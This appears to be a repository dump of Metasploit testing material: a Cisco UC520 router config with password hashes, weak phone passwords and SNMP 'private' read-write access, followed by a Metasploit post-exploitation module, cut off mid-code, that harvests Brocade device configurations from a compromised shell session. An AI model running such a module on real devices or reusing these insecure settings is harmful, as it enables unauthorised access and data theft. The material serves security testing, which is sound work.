32303535 36373730 3331301E 170D3030 30313031 30303031 44 | 31365A17 0D323030 31303130 30303030 305A3031 312F302D 06035504 03132649 45 | 4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D32 30353536 46 | 37373033 3130819F 300D0609 2A864886 F70D0101 01050003 818D0030 81890281 47 | 8100934F EED0CB61 0D691049 C52DEA74 D2DEFE95 03F7F302 AA563FCA 0E741849 48 | C5629146 B47332D1 908D0C7B D6D3995B 3EB0592E D26269F3 1C6BCC06 CFBA6E4D 49 | 568E6E51 A70A9A3C D1A314F5 5C9BB66B 946EC5B2 293F2CCB 844D2896 387DBA3D 50 | E873E955 D9AE3C76 7E62D5C3 8CF4B065 B65019A2 2CCE31C4 9C31736E 2EF9345E 51 | 51170203 010001A3 65306330 0F060355 1D130101 FF040530 030101FF 30100603 52 | 551D1104 09300782 05554335 3230301F 0603551D 23041830 16801454 FD27EC16 53 | 8B388832 CB566C5B 66F2DB56 2CBE9530 1D060355 1D0E0416 041454FD 27EC168B 54 | 388832CB 566C5B66 F2DB562C BE95300D 06092A86 4886F70D 01010405 00038181 55 | 002F0FD5 F3FD9532 E6E57F42 FED6D5E3 D989E9AE 19F585CF 7721BCBD 7E2325D3 56 | 10D41350 972C8FF3 AFEAC317 FB54BD15 58D0205B B62AA204 02B6F66B 7CFCB6A9 57 | 0E6A4ECC 7ADE1EA7 5A70E56E 60703A2E C66EE12F 6ADBE842 75932445 78FD834B 58 | 43B4A223 665A50CC 6207B46A 91252F23 4C07F2B6 035FC80C 08E487E3 4C94286E B6 59 | quit 60 | dot11 syslog 61 | ip source-route 62 | ip cef 63 | ! 64 | ! 65 | ip dhcp relay information trust-all 66 | ip dhcp excluded-address 10.1.1.1 10.1.1.10 67 | ip dhcp excluded-address 192.168.10.1 192.168.10.10 68 | ! 69 | ip dhcp pool phone 70 | network 10.1.1.0 255.255.255.0 71 | default-router 10.1.1.1 72 | option 150 ip 10.1.1.1 73 | ! 74 | ip dhcp pool data 75 | import all 76 | network 192.168.10.0 255.255.255.0 77 | default-router 192.168.10.1 78 | ! 79 | ! 80 | ip inspect name SDM_LOW cuseeme 81 | ip inspect name SDM_LOW dns 82 | ip inspect name SDM_LOW ftp 83 | ip inspect name SDM_LOW h323 84 | ip inspect name SDM_LOW https 85 | ip inspect name SDM_LOW icmp 86 | ip inspect name SDM_LOW imap 87 | ip inspect name SDM_LOW pop3 88 | ip inspect name SDM_LOW netshow 89 | ip inspect name SDM_LOW rcmd 90 | ip inspect name SDM_LOW realaudio 91 | ip inspect name SDM_LOW rtsp 92 | ip inspect name SDM_LOW esmtp 93 | ip inspect name SDM_LOW sqlnet 94 | ip inspect name SDM_LOW streamworks 95 | ip inspect name SDM_LOW tftp 96 | ip inspect name SDM_LOW tcp 97 | ip inspect name SDM_LOW udp router-traffic 98 | ip inspect name SDM_LOW vdolive 99 | ! 100 | no ipv6 cef 101 | ! 102 | stcapp ccm-group 1 103 | stcapp 104 | multilink bundle-name authenticated 105 | ! 106 | ! 107 | trunk group ALL_FXO 108 | max-retry 5 109 | voice-class cause-code 1 110 | hunt-scheme longest-idle 111 | ! 112 | ! 113 | voice call send-alert 114 | voice rtp send-recv 115 | ! 116 | voice service voip 117 | allow-connections h323 to h323 118 | allow-connections h323 to sip 119 | allow-connections sip to h323 120 | allow-connections sip to sip 121 | supplementary-service h450.12 122 | sip 123 | registrar server expires max 600 min 60 124 | no update-callerid 125 | ! 126 | ! 127 | voice class codec 1 128 | codec preference 1 g711ulaw 129 | codec preference 2 g729r8 130 | ! 131 | ! 132 | ! 133 | ! 134 | ! 135 | ! 136 | ! 137 | voice class cause-code 1 138 | no-circuit 139 | ! 140 | ! 141 | ! 142 | ! 143 | ! 144 | voice register global 145 | mode cme 146 | source-address 10.1.1.1 port 5060 147 | max-dn 56 148 | max-pool 14 149 | ! 150 | ! 151 | voice translation-rule 1000 152 | rule 1 /.*/ // 153 | ! 154 | ! 155 | voice translation-profile nondialable 156 | translate called 1000 157 | ! 158 | ! 159 | voice-card 0 160 | no dspfarm 161 | ! 162 | fax interface-type fax-mail 163 | ! 164 | ! 165 | username cisco privilege 15 secret 5 $1$DaqN$iP32E5WcOOui/H66R63QB0 166 | ! 167 | ! 168 | ! 169 | archive 170 | log config 171 | logging enable 172 | logging size 600 173 | hidekeys 174 | ! 175 | ! 176 | ip tftp source-interface Loopback0 177 | ip ssh time-out 60 178 | ! 179 | ! 180 | ! 181 | interface Loopback0 182 | description $FW_INSIDE$ 183 | ip address 10.1.10.2 255.255.255.252 184 | ip access-group 101 in 185 | ip nat inside 186 | ip virtual-reassembly 187 | ! 188 | interface FastEthernet0/0 189 | description $FW_OUTSIDE$ 190 | ip address dhcp 191 | ip access-group 101 in 192 | ip nat outside 193 | ip inspect SDM_LOW out 194 | ip virtual-reassembly 195 | load-interval 30 196 | duplex auto 197 | speed auto 198 | ! 199 | interface Integrated-Service-Engine0/0 200 | description cue is initialized with default IMAP group 201 | ip unnumbered Loopback0 202 | ip nat inside 203 | ip virtual-reassembly 204 | service-module ip address 10.1.10.1 255.255.255.252 205 | service-module ip default-gateway 10.1.10.2 206 | ! 207 | interface FastEthernet0/1/0 208 | description Phone: 7945 (FCE) 209 | switchport voice vlan 100 210 | macro description cisco-phone 211 | spanning-tree portfast 212 | ! 213 | interface FastEthernet0/1/1 214 | description Phone: 7931 215 | switchport voice vlan 100 216 | macro description cisco-phone 217 | spanning-tree portfast 218 | ! 219 | interface FastEthernet0/1/2 220 | description Phone: 524 221 | switchport voice vlan 100 222 | macro description cisco-phone 223 | spanning-tree portfast 224 | ! 225 | interface FastEthernet0/1/3 226 | description Phone: 7945 227 | switchport voice vlan 100 228 | macro description cisco-phone 229 | spanning-tree portfast 230 | ! 231 | interface FastEthernet0/1/4 232 | description Uplink: LAN 233 | switchport voice vlan 100 234 | macro description cisco-phone 235 | spanning-tree portfast 236 | ! 237 | interface FastEthernet0/1/5 238 | switchport voice vlan 100 239 | macro description cisco-phone 240 | spanning-tree portfast 241 | ! 242 | interface FastEthernet0/1/6 243 | switchport voice vlan 100 244 | macro description cisco-phone 245 | spanning-tree portfast 246 | ! 247 | interface FastEthernet0/1/7 248 | description VM Controller 249 | switchport voice vlan 100 250 | macro description cisco-phone 251 | spanning-tree portfast 252 | ! 253 | interface FastEthernet0/1/8 254 | switchport mode trunk 255 | switchport voice vlan 100 256 | macro description cisco-switch 257 | ! 258 | interface Vlan1 259 | description $FW_INSIDE$ 260 | ip address 192.168.10.1 255.255.255.0 261 | ip access-group 102 in 262 | ip nat inside 263 | ip virtual-reassembly 264 | ! 265 | interface Vlan100 266 | description $FW_INSIDE$ 267 | ip address 10.1.1.1 255.255.255.0 268 | ip access-group 103 in 269 | ip nat inside 270 | ip virtual-reassembly 271 | ! 272 | ip forward-protocol nd 273 | ip route 10.1.10.1 255.255.255.255 Integrated-Service-Engine0/0 274 | ! 275 | ip http server 276 | ip http authentication local 277 | ip http secure-server 278 | ip http path flash:/gui 279 | ip dns server 280 | ip nat inside source list 1 interface FastEthernet0/0 overload 281 | ! 282 | access-list 1 remark SDM_ACL Category=2 283 | access-list 1 permit 10.1.1.0 0.0.0.255 284 | access-list 1 permit 192.168.10.0 0.0.0.255 285 | access-list 1 permit 10.1.10.0 0.0.0.3 286 | access-list 100 remark auto generated by SDM firewall configuration 287 | access-list 100 remark SDM_ACL Category=1 288 | access-list 100 deny ip 192.168.10.0 0.0.0.255 any 289 | access-list 100 deny ip host 255.255.255.255 any 290 | access-list 100 deny ip 127.0.0.0 0.255.255.255 any 291 | access-list 100 permit ip any any 292 | access-list 101 remark auto generated by SDM firewall configuration 293 | access-list 101 remark SDM_ACL Category=1 294 | access-list 101 permit tcp 10.1.1.0 0.0.0.255 eq 2000 any 295 | access-list 101 permit udp 10.1.1.0 0.0.0.255 eq 2000 any 296 | access-list 101 deny ip 192.168.10.0 0.0.0.255 any 297 | access-list 101 deny ip 10.1.1.0 0.0.0.255 any 298 | access-list 101 deny ip host 255.255.255.255 any 299 | access-list 101 deny ip 127.0.0.0 0.255.255.255 any 300 | access-list 101 permit ip any any 301 | access-list 102 remark auto generated by SDM firewall configuration 302 | access-list 102 remark SDM_ACL Category=1 303 | access-list 102 deny ip 10.1.10.0 0.0.0.3 any 304 | access-list 102 deny ip 10.1.1.0 0.0.0.255 any 305 | access-list 102 deny ip host 255.255.255.255 any 306 | access-list 102 deny ip 127.0.0.0 0.255.255.255 any 307 | access-list 102 permit ip any any 308 | access-list 103 remark auto generated by SDM firewall configuration 309 | access-list 103 remark SDM_ACL Category=1 310 | access-list 103 permit tcp 10.1.10.0 0.0.0.3 any eq 2000 311 | access-list 103 permit udp 10.1.10.0 0.0.0.3 any eq 2000 312 | access-list 103 permit udp any 10.1.10.0 0.0.0.3 range 16384 32767 313 | access-list 103 permit udp 10.1.10.0 0.0.0.3 range 16384 32767 any 314 | access-list 103 deny ip 192.168.10.0 0.0.0.255 any 315 | access-list 103 deny ip host 255.255.255.255 any 316 | access-list 103 deny ip 127.0.0.0 0.255.255.255 any 317 | access-list 103 permit ip any any 318 | access-list 104 remark auto generated by SDM firewall configuration 319 | access-list 104 remark SDM_ACL Category=1 320 | access-list 104 deny ip 10.1.10.0 0.0.0.3 any 321 | access-list 104 deny ip 192.168.10.0 0.0.0.255 any 322 | access-list 104 deny ip 10.1.1.0 0.0.0.255 any 323 | access-list 104 permit udp any eq bootps any eq bootpc 324 | access-list 104 permit icmp any any echo-reply 325 | access-list 104 permit icmp any any time-exceeded 326 | access-list 104 permit icmp any any unreachable 327 | access-list 104 deny ip 10.0.0.0 0.255.255.255 any 328 | access-list 104 deny ip 172.16.0.0 0.15.255.255 any 329 | access-list 104 deny ip 192.168.0.0 0.0.255.255 any 330 | access-list 104 deny ip 127.0.0.0 0.255.255.255 any 331 | access-list 104 deny ip host 255.255.255.255 any 332 | access-list 104 deny ip any any 333 | access-list 104 permit tcp any any 334 | access-list 104 permit icmp any any 335 | access-list 104 permit ip any any 336 | snmp-server community public RO 337 | snmp-server community private RW 338 | ! 339 | ! 340 | ! 341 | ! 342 | ! 343 | tftp-server flash:/phones/521_524/cp524g-8-1-17.bin alias cp524g-8-1-17.bin 344 | tftp-server flash:/phones/7931/apps31.9-1-1TH1-16.sbn alias apps31.9-1-1TH1-16.sbn 345 | tftp-server flash:/phones/7931/cnu31.9-1-1TH1-16.sbn alias cnu31.9-1-1TH1-16.sbn 346 | tftp-server flash:/phones/7931/cvm31sccp.9-1-1TH1-16.sbn alias cvm31sccp.9-1-1TH1-16.sbn 347 | tftp-server flash:/phones/7931/dsp31.9-1-1TH1-16.sbn alias dsp31.9-1-1TH1-16.sbn 348 | tftp-server flash:/phones/7931/jar31sccp.9-1-1TH1-16.sbn alias jar31sccp.9-1-1TH1-16.sbn 349 | tftp-server flash:/phones/7931/SCCP31.9-1-1SR1S.loads alias SCCP31.9-1-1SR1S.loads 350 | tftp-server flash:/phones/7931/term31.default.loads alias term31.default.loads 351 | tftp-server flash:/phones/7945_7965/apps45.9-1-1TH1-16.sbn alias apps45.9-1-1TH1-16.sbn 352 | tftp-server flash:/phones/7945_7965/cnu45.9-1-1TH1-16.sbn alias cnu45.9-1-1TH1-16.sbn 353 | tftp-server flash:/phones/7945_7965/cvm45sccp.9-1-1TH1-16.sbn alias cvm45sccp.9-1-1TH1-16.sbn 354 | tftp-server flash:/phones/7945_7965/dsp45.9-1-1TH1-16.sbn alias dsp45.9-1-1TH1-16.sbn 355 | tftp-server flash:/phones/7945_7965/jar45sccp.9-1-1TH1-16.sbn alias jar45sccp.9-1-1TH1-16.sbn 356 | tftp-server flash:/phones/7945_7965/SCCP45.9-1-1SR1S.loads alias SCCP45.9-1-1SR1S.loads 357 | tftp-server flash:/phones/7945_7965/term45.default.loads alias term45.default.loads 358 | tftp-server flash:/phones/7945_7965/term65.default.loads alias term65.default.loads 359 | tftp-server flash:/ringtones/Analog1.raw alias Analog1.raw 360 | tftp-server flash:/ringtones/Analog2.raw alias Analog2.raw 361 | tftp-server flash:/ringtones/AreYouThere.raw alias AreYouThere.raw 362 | tftp-server flash:/ringtones/DistinctiveRingList.xml alias DistinctiveRingList.xml 363 | tftp-server flash:/ringtones/RingList.xml alias RingList.xml 364 | tftp-server flash:/ringtones/AreYouThereF.raw alias AreYouThereF.raw 365 | tftp-server flash:/ringtones/Bass.raw alias Bass.raw 366 | tftp-server flash:/ringtones/CallBack.raw alias CallBack.raw 367 | tftp-server flash:/ringtones/Chime.raw alias Chime.raw 368 | tftp-server flash:/ringtones/Classic1.raw alias Classic1.raw 369 | tftp-server flash:/ringtones/Classic2.raw alias Classic2.raw 370 | tftp-server flash:/ringtones/ClockShop.raw alias ClockShop.raw 371 | tftp-server flash:/ringtones/Drums1.raw alias Drums1.raw 372 | tftp-server flash:/ringtones/Drums2.raw alias Drums2.raw 373 | tftp-server flash:/ringtones/FilmScore.raw alias FilmScore.raw 374 | tftp-server flash:/ringtones/HarpSynth.raw alias HarpSynth.raw 375 | tftp-server flash:/ringtones/Jamaica.raw alias Jamaica.raw 376 | tftp-server flash:/ringtones/KotoEffect.raw alias KotoEffect.raw 377 | tftp-server flash:/ringtones/MusicBox.raw alias MusicBox.raw 378 | tftp-server flash:/ringtones/Piano1.raw alias Piano1.raw 379 | tftp-server flash:/ringtones/Piano2.raw alias Piano2.raw 380 | tftp-server flash:/ringtones/Pop.raw alias Pop.raw 381 | tftp-server flash:/ringtones/Pulse1.raw alias Pulse1.raw 382 | tftp-server flash:/ringtones/Ring1.raw alias Ring1.raw 383 | tftp-server flash:/ringtones/Ring2.raw alias Ring2.raw 384 | tftp-server flash:/ringtones/Ring3.raw alias Ring3.raw 385 | tftp-server flash:/ringtones/Ring4.raw alias Ring4.raw 386 | tftp-server flash:/ringtones/Ring5.raw alias Ring5.raw 387 | tftp-server flash:/ringtones/Ring6.raw alias Ring6.raw 388 | tftp-server flash:/ringtones/Ring7.raw alias Ring7.raw 389 | tftp-server flash:/ringtones/Sax1.raw alias Sax1.raw 390 | tftp-server flash:/ringtones/Sax2.raw alias Sax2.raw 391 | tftp-server flash:/ringtones/Vibe.raw alias Vibe.raw 392 | tftp-server flash:/Desktops/CampusNight.png 393 | tftp-server flash:/Desktops/TN-CampusNight.png 394 | tftp-server flash:/Desktops/CiscoFountain.png 395 | tftp-server flash:/Desktops/TN-CiscoFountain.png 396 | tftp-server flash:/Desktops/CiscoLogo.png 397 | tftp-server flash:/Desktops/TN-CiscoLogo.png 398 | tftp-server flash:/Desktops/Fountain.png 399 | tftp-server flash:/Desktops/TN-Fountain.png 400 | tftp-server flash:/Desktops/MorroRock.png 401 | tftp-server flash:/Desktops/TN-MorroRock.png 402 | tftp-server flash:/Desktops/NantucketFlowers.png 403 | tftp-server flash:/Desktops/TN-NantucketFlowers.png 404 | tftp-server flash:Desktops/320x212x16/List.xml 405 | tftp-server flash:Desktops/320x212x12/List.xml 406 | tftp-server flash:Desktops/320x216x16/List.xml 407 | tftp-server flash:/bacdprompts/en_bacd_allagentsbusy.au alias en_bacd_allagentsbusy.au 408 | tftp-server flash:/bacdprompts/en_bacd_disconnect.au alias en_bacd_disconnect.au 409 | tftp-server flash:/bacdprompts/en_bacd_enter_dest.au alias en_bacd_enter_dest.au 410 | tftp-server flash:/bacdprompts/en_bacd_invalidoption.au alias en_bacd_invalidoption.au 411 | tftp-server flash:/bacdprompts/en_bacd_music_on_hold.au alias en_bacd_music_on_hold.au 412 | tftp-server flash:/bacdprompts/en_bacd_options_menu.au alias en_bacd_options_menu.au 413 | tftp-server flash:/bacdprompts/en_bacd_welcome.au alias en_bacd_welcome.au 414 | tftp-server flash:/bacdprompts/en_bacd_xferto_operator.au alias en_bacd_xferto_operator.au 415 | ! 416 | control-plane 417 | ! 418 | ! 419 | ! 420 | voice-port 0/0/0 421 | caller-id enable 422 | ! 423 | voice-port 0/0/1 424 | caller-id enable 425 | ! 426 | voice-port 0/0/2 427 | caller-id enable 428 | ! 429 | voice-port 0/0/3 430 | caller-id enable 431 | ! 432 | voice-port 0/1/0 433 | trunk-group ALL_FXO 64 434 | connection plar 201 435 | caller-id enable 436 | ! 437 | voice-port 0/1/1 438 | trunk-group ALL_FXO 64 439 | connection plar 202 440 | caller-id enable 441 | ! 442 | voice-port 0/1/2 443 | trunk-group ALL_FXO 64 444 | connection plar 203 445 | caller-id enable 446 | ! 447 | voice-port 0/1/3 448 | trunk-group ALL_FXO 64 449 | connection plar 204 450 | caller-id enable 451 | ! 452 | voice-port 0/4/0 453 | auto-cut-through 454 | signal immediate 455 | input gain auto-control -15 456 | description Music On Hold Port 457 | ! 458 | sccp local Loopback0 459 | sccp ccm 10.1.1.1 identifier 1 460 | sccp 461 | ! 462 | sccp ccm group 1 463 | associate ccm 1 priority 1 464 | ! 465 | dial-peer cor custom 466 | name internal 467 | name local 468 | name local-plus 469 | name international 470 | name national 471 | name national-plus 472 | name emergency 473 | name toll-free 474 | ! 475 | ! 476 | dial-peer cor list call-internal 477 | member internal 478 | ! 479 | dial-peer cor list call-local 480 | member local 481 | ! 482 | dial-peer cor list call-local-plus 483 | member local-plus 484 | ! 485 | dial-peer cor list call-national 486 | member national 487 | ! 488 | dial-peer cor list call-national-plus 489 | member national-plus 490 | ! 491 | dial-peer cor list call-international 492 | member international 493 | ! 494 | dial-peer cor list call-emergency 495 | member emergency 496 | ! 497 | dial-peer cor list call-toll-free 498 | member toll-free 499 | ! 500 | dial-peer cor list user-internal 501 | member internal 502 | member emergency 503 | ! 504 | dial-peer cor list user-local 505 | member internal 506 | member local 507 | member emergency 508 | member toll-free 509 | ! 510 | dial-peer cor list user-local-plus 511 | member internal 512 | member local 513 | member local-plus 514 | member emergency 515 | member toll-free 516 | ! 517 | dial-peer cor list user-national 518 | member internal 519 | member local 520 | member local-plus 521 | member national 522 | member emergency 523 | member toll-free 524 | ! 525 | dial-peer cor list user-national-plus 526 | member internal 527 | member local 528 | member local-plus 529 | member national 530 | member national-plus 531 | member emergency 532 | member toll-free 533 | ! 534 | dial-peer cor list user-international 535 | member internal 536 | member local 537 | member local-plus 538 | member international 539 | member national 540 | member national-plus 541 | member emergency 542 | member toll-free 543 | ! 544 | ! 545 | dial-peer voice 1 pots 546 | port 0/0/0 547 | no sip-register 548 | ! 549 | dial-peer voice 2 pots 550 | port 0/0/1 551 | no sip-register 552 | ! 553 | dial-peer voice 3 pots 554 | port 0/0/2 555 | no sip-register 556 | ! 557 | dial-peer voice 4 pots 558 | port 0/0/3 559 | no sip-register 560 | ! 561 | dial-peer voice 5 pots 562 | description ** MOH Port ** 563 | destination-pattern ABC 564 | port 0/4/0 565 | no sip-register 566 | ! 567 | dial-peer voice 6 pots 568 | description catch all dial peer for BRI/PRIv 569 | translation-profile incoming nondialable 570 | incoming called-number .% 571 | direct-inward-dial 572 | ! 573 | dial-peer voice 50 pots 574 | description ** incoming dial peer ** 575 | incoming called-number ^AAAA$ 576 | port 0/1/0 577 | ! 578 | dial-peer voice 51 pots 579 | description ** incoming dial peer ** 580 | incoming called-number ^AAAA$ 581 | port 0/1/1 582 | ! 583 | dial-peer voice 52 pots 584 | description ** incoming dial peer ** 585 | incoming called-number ^AAAA$ 586 | port 0/1/2 587 | ! 588 | dial-peer voice 53 pots 589 | description ** incoming dial peer ** 590 | incoming called-number ^AAAA$ 591 | port 0/1/3 592 | ! 593 | dial-peer voice 54 pots 594 | description ** FXO pots dial-peer ** 595 | destination-pattern A0 596 | port 0/1/0 597 | no sip-register 598 | ! 599 | dial-peer voice 55 pots 600 | description ** FXO pots dial-peer ** 601 | destination-pattern A1 602 | port 0/1/1 603 | no sip-register 604 | ! 605 | dial-peer voice 56 pots 606 | description ** FXO pots dial-peer ** 607 | destination-pattern A2 608 | port 0/1/2 609 | no sip-register 610 | ! 611 | dial-peer voice 57 pots 612 | description ** FXO pots dial-peer ** 613 | destination-pattern A3 614 | port 0/1/3 615 | no sip-register 616 | ! 617 | dial-peer voice 2000 voip 618 | description ** cue voicemail pilot number ** 619 | destination-pattern 399 620 | b2bua 621 | voice-class sip outbound-proxy ipv4:10.1.10.1 622 | session protocol sipv2 623 | session target ipv4:10.1.10.1 624 | dtmf-relay rtp-nte 625 | codec g711ulaw 626 | no vad 627 | ! 628 | dial-peer voice 2001 voip 629 | dtmf-relay rtp-nte 630 | ! 631 | dial-peer voice 2012 voip 632 | dtmf-relay rtp-nte 633 | ! 634 | ! 635 | no dial-peer outbound status-check pots 636 | ! 637 | ! 638 | telephony-service 639 | video 640 | fxo hook-flash 641 | load 7931 SCCP31.9-1-1SR1S 642 | load 7945 SCCP45.9-1-1SR1S 643 | load 7965 SCCP45.9-1-1SR1S 644 | load 521G-524G cp524g-8-1-17 645 | max-ephones 14 646 | max-dn 56 647 | ip source-address 10.1.1.1 port 2000 648 | auto assign 1 to 1 type bri 649 | calling-number initiator 650 | service phone videoCapability 1 651 | service phone ehookenable 1 652 | service dnis overlay 653 | service dnis dir-lookup 654 | service dss 655 | timeouts interdigit 5 656 | system message UC520 657 | url services http://10.1.10.1/voiceview/common/login.do 658 | url authentication http://10.1.10.2/CCMCIP/authenticate.asp 659 | time-zone 5 660 | keepalive 30 auxiliary 4 661 | voicemail 399 662 | max-conferences 8 gain -6 663 | call-forward pattern .T 664 | call-forward system redirecting-expanded 665 | moh flash:/media/music-on-hold.au 666 | multicast moh 239.10.16.16 port 2000 667 | web admin system name cisco secret 5 $1$n/n0$q6wNrBypu0GDpxzfSwGnf1 668 | dn-webedit 669 | time-webedit 670 | transfer-system full-consult dss 671 | transfer-pattern 9.T 672 | transfer-pattern .T 673 | secondary-dialtone 9 674 | night-service day Sun 17:00 09:00 675 | night-service day Mon 17:00 09:00 676 | night-service day Tue 17:00 09:00 677 | night-service day Wed 17:00 09:00 678 | night-service day Thu 17:00 09:00 679 | night-service day Fri 17:00 09:00 680 | night-service day Sat 17:00 09:00 681 | fac standard 682 | create cnf-files version-stamp Jan 01 2002 00:00:00 683 | ! 684 | ! 685 | ephone-template 15 686 | url services 1 http://10.1.10.1/voiceview/common/login.do VoiceviewExpress 687 | softkeys remote-in-use Newcall 688 | softkeys idle Redial Newcall Cfwdall Pickup Gpickup Dnd Login 689 | softkeys seized Cfwdall Endcall Redial Pickup Gpickup Callback 690 | softkeys connected Hold Endcall Trnsfer Confrn Acct Park 691 | button-layout 7931 2 692 | ! 693 | ! 694 | ephone-template 16 695 | url services 1 http://10.1.10.1/voiceview/common/login.do VoiceviewExpress 696 | softkeys remote-in-use Newcall 697 | softkeys idle Redial Newcall Cfwdall Pickup Gpickup Dnd Login 698 | softkeys seized Cfwdall Endcall Redial Pickup Gpickup Callback 699 | softkeys connected Hold Endcall Trnsfer Confrn Acct Park 700 | ! 701 | ! 702 | ephone-template 17 703 | url services 1 http://10.1.10.1/voiceview/common/login.do VoiceviewExpress 704 | softkeys remote-in-use CBarge Newcall 705 | softkeys idle Redial Newcall Cfwdall Pickup Gpickup Dnd Login 706 | softkeys seized Cfwdall Endcall Redial Pickup Gpickup Callback 707 | softkeys connected Hold Endcall Trnsfer Confrn Acct Park 708 | ! 709 | ! 710 | ephone-template 18 711 | url services 1 http://10.1.10.1/voiceview/common/login.do VoiceviewExpress 712 | softkeys remote-in-use CBarge Newcall 713 | softkeys idle Redial Newcall Cfwdall Pickup Gpickup Dnd Login 714 | softkeys seized Cfwdall Endcall Redial Pickup Gpickup Callback 715 | softkeys connected Hold Endcall Trnsfer Confrn Acct Park 716 | button-layout 7931 2 717 | ! 718 | ! 719 | ephone-dn 1 720 | number 101 no-reg primary 721 | description IP-Paging1 722 | name Everyone 723 | paging ip 239.1.1.1 port 2000 724 | ! 725 | ! 726 | ephone-dn 9 727 | number BCD no-reg primary 728 | description MoH 729 | moh out-call ABC 730 | ! 731 | ! 732 | ephone-dn 49 733 | number A691 no-reg primary 734 | name phone three 735 | intercom A642 label "phonethree" 736 | ! 737 | ! 738 | ephone-dn 50 739 | number A642 no-reg primary 740 | name phone two 741 | intercom A691 label "phontwo" 742 | ! 743 | ! 744 | ephone-dn 51 octo-line 745 | number 444 no-reg primary 746 | label 444 747 | name phone four 748 | call-forward busy 399 749 | call-forward noan 399 timeout 20 750 | ! 751 | ! 752 | ephone-dn 52 dual-line 753 | number 333 no-reg primary 754 | label 333 755 | name phone three 756 | ! 757 | ! 758 | ephone-dn 53 octo-line 759 | number 222 no-reg primary 760 | label 222 761 | name phone two 762 | call-forward busy 399 763 | call-forward noan 399 timeout 20 764 | ! 765 | ! 766 | ephone-dn 54 octo-line 767 | number 111 no-reg primary 768 | label 111 769 | name phone one 770 | call-forward busy 399 771 | call-forward noan 399 timeout 20 772 | ! 773 | ! 774 | ephone-dn 55 775 | number A801... no-reg primary 776 | mwi off 777 | ! 778 | ! 779 | ephone-dn 56 780 | number A800... no-reg primary 781 | mwi on 782 | ! 783 | ! 784 | ephone 1 785 | device-security-mode none 786 | mac-address 0023.331B.3188 787 | ephone-template 15 788 | username "phoneone" password 111111 789 | paging-dn 1 790 | codec g711ulaw 791 | type 7945 792 | button 1:54 793 | ! 794 | ! 795 | ! 796 | ephone 2 797 | device-security-mode none 798 | mac-address 001B.D53D.9D4D 799 | ephone-template 15 800 | username "phonetwo" password 222222 801 | speed-dial 1 101 label "Paging" 802 | paging-dn 1 803 | codec g711ulaw 804 | type 7931 805 | button 1:53 2m54 3m52 4m51 806 | button 5w54 6w52 7w51 8:50 807 | ! 808 | ! 809 | ! 810 | ephone 3 811 | device-security-mode none 812 | mac-address 001D.E5EA.9CD9 813 | ephone-template 16 814 | max-calls-per-button 2 815 | username "phonethree" password 333333 816 | paging-dn 1 817 | codec g711ulaw 818 | type 524G 819 | button 1:52 2:49 820 | ! 821 | ! 822 | ! 823 | ephone 4 824 | device-security-mode none 825 | mac-address 0023.331B.7FCE 826 | ephone-template 16 827 | username "phonefour" password 444444 828 | paging-dn 1 829 | codec g711ulaw 830 | type 7945 831 | button 1:51 832 | ! 833 | ! 834 | banner login ^CCisco Configuration Assistant. Version: 3.1 (1). Sat Oct 06 14:18:08 EDT 2018^C 835 | alias exec cca_voice_mode PBX 836 | ! 837 | line con 0 838 | no modem enable 839 | line aux 0 840 | line 2 841 | no activation-character 842 | no exec 843 | transport preferred none 844 | transport input all 845 | line vty 0 4 846 | transport preferred none 847 | transport input ssh 848 | line vty 5 100 849 | transport preferred none 850 | transport input all 851 | ! 852 | ntp master 853 | end 854 | -------------------------------------------------------------------------------- /coloradoftp-prime-8.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/coloradoftp-prime-8.zip -------------------------------------------------------------------------------- /enum_brocade.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | require 'rex' 8 | #require 'msf/core/auxiliary/cisco' 9 | 10 | class Metasploit3 < Msf::Post 11 | #include Msf::Auxiliary::Cisco 12 | def initialize(info={}) 13 | super( update_info( info, 14 | 'Name' => 'Brocade Gather Device General Information', 15 | 'Description' => %q{ 16 | This module collects a Brocade device information and configuration. 17 | }, 18 | 'License' => MSF_LICENSE, 19 | 'Author' => [ 'h00die '], 20 | 'SessionTypes' => [ 'shell' ] 21 | )) 22 | 23 | register_options( 24 | [ 25 | OptString.new('ENABLE_UN', [false, 'Enable username for changing privilege level.']), 26 | OptString.new('ENABLE_PASS', [false, 'Enable password for changing privilege level.']) 27 | ], self.class) 28 | 29 | end 30 | 31 | def run 32 | # Get device prompt 33 | prompt = session.shell_command("") 34 | 35 | # Set terminal length to 0 so no paging is required 36 | #session.shell_write("term len 0 \n") 37 | 38 | # Get version info 39 | print_status("Getting version information") 40 | show_ver_cmd = "show version" 41 | ver_out = session.shell_command(show_ver_cmd) 42 | ver = ver_out.match(/SW: Version (?.*)\n/) 43 | #print_status(ver["ver_no"]) 44 | 45 | 46 | 47 | # Get current privilege level 48 | #print_status("Getting privilege level") 49 | #priv_cmd = "show priv" 50 | #priv = (session.shell_command(priv_cmd)).scan(/privilege level is (\d*)/).join 51 | 52 | # Mark the OS 53 | os_type = "Brocade" 54 | os_loot = "brocade" 55 | case prompt 56 | when />/ 57 | mode = "User Level" 58 | when /#/ 59 | mode = "Enabled" 60 | end 61 | 62 | print_status("The device OS is #{os_type} version #{ver["ver_no"]}") 63 | #print_status("Session running in mode #{mode}") 64 | print_status("Privilege level #{mode}") 65 | 66 | ver_loc = store_loot("brocade.ios.version", 67 | "text/plain", 68 | session, 69 | ver["ver_no"].strip, 70 | "version.txt", #? 71 | "Brocade Version") 72 | # Print the version of VERBOSE set to true. 73 | vprint_status("version information stored in to loot, file:#{ver_loc}") 74 | 75 | # Enumerate depending priv level 76 | case mode 77 | when "enabled" 78 | enum_exec(prompt) 79 | enum_priv(prompt) 80 | end 81 | end 82 | 83 | # Run enumeration commands for when privilege level is 7 or 15 84 | def enum_priv(prompt) 85 | host,port = session.session_host, session.session_port 86 | priv_commands = [ 87 | { 88 | "cmd" => "show running-config", 89 | "fn" => "run_config", 90 | "desc" => "Brocade Device running configuration" 91 | }, 92 | # { 93 | # "cmd" => "show cdp neigh", 94 | # "fn" => "cdp_neighbors", 95 | # "desc" => "Cisco Device CDP Neighbors" 96 | # }, 97 | { 98 | "cmd" => "show lldp neighbors", 99 | "fn" => "cdp_neighbors", 100 | "desc" => "Brocade Device LLDP Neighbors" 101 | } 102 | ] 103 | priv_commands.each do |ec| 104 | cmd_out = session.shell_command(ec['cmd']).gsub(/#{ec['cmd']}|#{prompt}/,"") 105 | next if cmd_out =~ /Invalid 